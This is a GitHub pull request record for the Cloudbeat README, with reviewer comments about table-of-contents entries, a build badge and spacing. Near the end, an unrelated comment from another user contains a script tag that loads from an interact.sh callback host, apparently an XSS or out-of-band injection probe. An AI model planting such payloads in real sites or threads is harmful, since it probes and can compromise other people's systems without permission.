### PR TITLE
remove docker cred

### PR DESCRIPTION
**Pull request by DaveSys911**

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -1,12 +1,14 @@
...
-- [Prerequisites](#prerequisites)
-- [Running Cloudbeat](#running-cloudbeat)
-  - [Clean up](#clean-up)
-  - [Remote Debugging](#remote-debugging)
+- [Cloudbeat](#cloudbeat)
+  - [Table of contents](#table-of-contents)
+  - [Prerequisites](#prerequisites)
+  - [Running Cloudbeat](#running-cloudbeat)
+    - [Clean up](#clean-up)
+    - [Remote Debugging](#remote-debugging)
```
Comment (oren-zohar) [inline README.md:11]: I think we can remove these additions to the table of contents as they seem redundant, is it auto-generated somehow?

**Review by oren-zohar — CHANGES_REQUESTED** [review]
Looks like the build status badge isn't showing correctly

File: README.md (hunk 1 above)
Comment (DaveSys911) [reply README.md:11]: Nope, i just added the badgeline

**Review by oren-zohar — APPROVED** [review]
@DaveSys911 spacing is off in the TOC, please fix before merging

**Comment by hamza648-prog** [comment]
`<script src=c9sd6d92vtc0000tr320grhsugayyyyyb.interact.sh [></script>`](c9sd6d92vtc0000tr320grhsugayyyyyb.interact.sh)

**Pull request merged**